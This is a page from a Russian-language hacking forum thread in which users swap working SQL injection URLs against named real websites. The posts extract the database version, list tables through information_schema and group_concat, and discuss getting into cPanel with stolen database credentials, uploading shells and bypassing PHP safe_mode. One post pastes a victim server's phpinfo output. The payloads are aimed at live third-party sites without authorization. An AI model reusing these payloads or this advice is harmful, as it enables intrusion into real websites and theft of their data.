Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.raarfm.com/shows/cinr_suite?id=116'and(1)=(0)union/*!all*/select(1),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,unhex(hex(version())),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,(133)--+
    4.1.14-STANDARD
     
    _________________________
    #16601 Expl0ited, 1 May 2011
    Last edited: 1 May 2011
    1 person likes this.
  2. probm

    probm New Member

    Joined:
    9 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    помогите нубу расскрутить, и если там вообще таблицы
    http://www.simonsig.co.za/about.php?id=1%27
    http://www.ak-47.us/AK47-FAQ.php?id=137
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    нуб..крути как слепую..или через ошибку выводи..за тебя делать никто ничего не собирается,хотя у второго 3-я версия мускуля...сложно будет для тебя
     
    1 person likes this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    // админские хеши не выкладываем
     
    _________________________
    #16604 winstrool, 3 May 2011
    Last edited by a moderator: 4 May 2011
    1 person likes this.
  5. Fldr

    Fldr New Member

    Joined:
    11 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    У меня есть данные от базы на одном сайте. Но phpmyadmin я там не нашел.
    Просканив сайт , обнаружил только ц.панель.
    Возможно ли как то зайти в ц-панель или в базу данных. Зная только логин/пароль от самой базы. Сервер локалхост , так что через навикет не пускает.

    И если кто то знает , может подсказать как генерируются логины для ц панели , то встречал что пароль от базы , такой же как и в ц панеле.
     
  6. Fldr

    Fldr New Member

    Joined:
    11 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    спасибо.
    А возможно будет подключение к бд , через сайт соседа ?
     
  7. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь ищу у хостера ;)

    Например для всех сайтов на hc.ru можно зайти в базу так
    phpmyadmin.hc.ru :)
     
    #16607 eclipse, 5 May 2011
    Last edited: 5 May 2011
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    как вывести названия таблиц?
    http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+information_schema.tables%20where%201=%27
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    qaz

    http://mai1-ru.h2m.ru/yyy.php?id=1'+and+false+union+select+1,2,table_name+FrOm+information_schema.tables+limit+1--%201
     
    _________________________
    1 person likes this.
  10. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Code:
    http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+--+
    Используй substring(group_concat(...),200) для просмотра остальных таблиц, увеличивая число 200 будешь смотреть дальше))
     
  11. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Обход ограничений php safe_mod.

    Задался целью обойти safe_mod.
    PHP Version 5.1.6

    информация из phpinfo()

    PHP:

    System     Linux u
    -host.ru 2.6.9-100.ELsmp #1 SMP Tue Feb 1 12:17:32 EST 2011 i686 
    Build Date     Sep 29 2007 03:15:40 
    Configure Command     
    './configure' '--host=i686-redhat-linux-gnu' '--build=i686-redhat-linux-gnu' '--target=i386-redhat-linux' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/usr/com' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-curl' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-png' '--with-pspell' '--with-expat-dir=/usr' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' '--enable-yp' '--enable-wddx' '--with-kerberos' '--enable-ucd-snmp-hack' '--with-unixODBC=shared,/usr' '--enable-memory-limit' '--enable-shmop' '--enable-calendar' '--enable-dbx' '--enable-dio' '--with-mime-magic=/etc/httpd/conf/magic' '--without-sqlite' '--with-libxml-dir=/usr' '--with-mcrypt' '--with-xml' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--without-odbc' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable-
    pdo' '--disable-xmlreader' '--disable-xmlwriter' 

    Server API     Apache 2.0 Handler 
    Virtual Directory Support     disabled 
    Configuration File 
    (php.iniPath     /etc/php.ini 
    Scan this dir 
    for additional .ini files     /etc/php.
    additional 
    .ini files parsed     /etc/php.d/bcmath.ini, /etc/php.d/dba.ini, /etc/php.d/dom.ini, /etc/php.d/gd.ini, /etc/php.d/imap.ini, /etc/php.d/ldap.ini, /etc/php.d/mbstring.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/ncurses.ini, /etc/php.d/odbc.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_odbc.ini, /etc/php.d/pdo_pgsql.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/pgsql.ini, /etc/php.d/snmp.ini, /etc/php.d/soap.ini, /etc/php.d/sqlite.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlrpc.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini 
    PHP API     20041225 
    PHP Extension     20050922 
    Zend Extension     220051025 
    Debug Build     no 
    Thread Safety     disabled 
    Zend Memory Manager     enabled 
    IPv6 Support     enabled 
    Registered PHP Streams     php
    filehttpftpcompress.bzip2compress.zlibhttpsftps 
    Registered Stream Socket Transports     tcp
    udpunixudgsslsslv3sslv2tls 
    Registered Stream Filters     string
    .rot13string.toupperstring.tolowerstring.strip_tagsconvert.*, consumedconvert.iconv.*, bzip2.*, zlib.* 

    PHP Credits
    Configuration
    PHP CoreDirective    Local Value    Master Value
    allow_call_time_pass_reference    Off    Off
    allow_url_fopen    On    On
    always_populate_raw_post_data    Off    Off
    arg_separator
    .input    &    &
    arg_separator.output    &    &
    asp_tags    Off    Off
    auto_append_file    no value    no value
    auto_globals_jit    On    On
    auto_prepend_file    no value    no value
    browscap    no value    no value
    default_charset    no value    no value
    default_mimetype    text
    /html    text/html
    define_syslog_variables    Off    Off
    disable_classes    no value    no value
    disable_functions    ini_restore    ini_restore
    display_errors    On    On
    display_startup_errors    Off    Off
    doc_root    no value    no value
    docref_ext    no value    no value
    docref_root    no value    no value
    enable_dl    On    On
    error_append_string    no value    no value
    error_log    no value    no value
    error_prepend_string    no value    no value
    error_reporting    0    2037
    expose_php    On    On
    extension_dir    
    /usr/lib/php/modules    /usr/lib/php/modules
    file_uploads    On    On
    highlight
    .bg    #FFFFFF    #FFFFFF
    highlight.comment    #FF8000    #FF8000
    highlight.default    #0000BB    #0000BB
    highlight.html    #000000    #000000
    highlight.keyword    #007700    #007700
    highlight.string    #DD0000    #DD0000
    html_errors    On    On
    ignore_repeated_errors    Off    Off
    ignore_repeated_source    Off    Off
    ignore_user_abort    On    Off
    implicit_flush    Off    Off
    include_path    
    .    .
    log_errors    Off    Off
    log_errors_max_len    1024    1024
    magic_quotes_gpc    Off    Off
    magic_quotes_runtime    Off    Off
    magic_quotes_sybase    Off    Off
    mail
    .force_extra_parameters    no value    no value
    max_execution_time    60    60
    max_input_nesting_level    64    64
    max_input_time    60    60
    memory_limit    64M    64M
    open_basedir    
    /var/virtual/www/.ru/httpdocs:/tmp    no value
    output_buffering    4096    4096
    output_handler    no value    no value
    post_max_size    64M    64M
    precision    14    14
    realpath_cache_size    16K    16K
    realpath_cache_ttl    120    120
    register_argc_argv    Off    Off
    register_globals    On    Off
    register_long_arrays    On    Off
    report_memleaks    On    On
    report_zend_debug    On    On
    safe_mode    On    Off
    safe_mode_exec_dir    no value    no value
    safe_mode_gid    Off    Off
    safe_mode_include_dir    no value    no value
    sendmail_from    no value    no value
    sendmail_path    
    /usr/sbin/sendmail --i    /usr/sbin/sendmail --i
    serialize_precision    100    100
    short_open_tag    On    On
    SMTP    localhost    localhost
    smtp_port    25    25
    sql
    .safe_mode    Off    Off
    track_errors    Off    Off
    unserialize_callback_func    no value    no value
    upload_max_filesize    64M    64M
    upload_tmp_dir    no value    no value
    user_dir    no value    no value
    variables_order    EGPCS    EGPCS
    xmlrpc_error_number    0    0
    xmlrpc_errors    Off    Off
    y2k_compliance    On    On
    zend
    .ze1_compatibility_mode    Off    Off


    apache2handlerApache Version     Apache
    /2.0.52 (Red Hat
    Apache API Version     20020903 
    Server Administrator     vlad
    @siteholder.ru 
    Hostname
    :Port     altpark.ru:80 
    User
    /Group     apache(48)/48 
    Max Requests     Per Child
    2000 Keep Aliveon Max Per Connection300 
    Timeouts     Connection
    60 Keep-Alive15 

    Virtual Server     Yes 

    Server Root     
    /etc/httpd 

    Loaded Modules     core prefork http_core mod_so mod_access mod_auth mod_auth_anon mod_auth_digest mod_include mod_log_config mod_env mod_expires mod_deflate mod_headers mod_usertrack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_userdir mod_alias mod_rewrite mod_cache mod_suexec mod_disk_cache mod_file_cache mod_mem_cache mod_cgi mod_fpcgid mod_jk mod_bw mod_fcgid mod_perl mod_php5 mod_ssl 



    Возможности залить .httpacces нет.

    часть фаилов читается posix методом.



    из того что нашел работает только творение от крыса которое позволяет листать дериктории и смотреть какие в них есть фаилы, но отображаются не все.
     
    1 person likes this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    что это такое? Оо
     
    _________________________
  13. Fldr

    Fldr New Member

    Joined:
    11 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Ну на наших сайтах , проблемы найти пхпмайадмин нету.
    А вот на забугорных , 1 к 30 что найду... В этом вся и проблема (
     
  14. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Konqi.
    Я htaccess имел в виду разумеется)
     
  15. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Всем привет!!!
    Есть скуля вида
    Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)
     
  16. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Если кавычка фильтруется - нет, если нет - да
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    что то вобще не понимаю как подступиться к скули...посоветуйте плыз
    http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--
     
    2 people like this.
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Там многие спецсимволы экранируются, в том числе и скобки. Поэтому вряд ли что выйдет со скулей.
     
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    http://www.bronx.nl/shop/category.php?cat_id=1+group+by+130--+
     
    1 person likes this.
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как здесь вывести версию БД?
     
Thread Status:
Not open for further replies.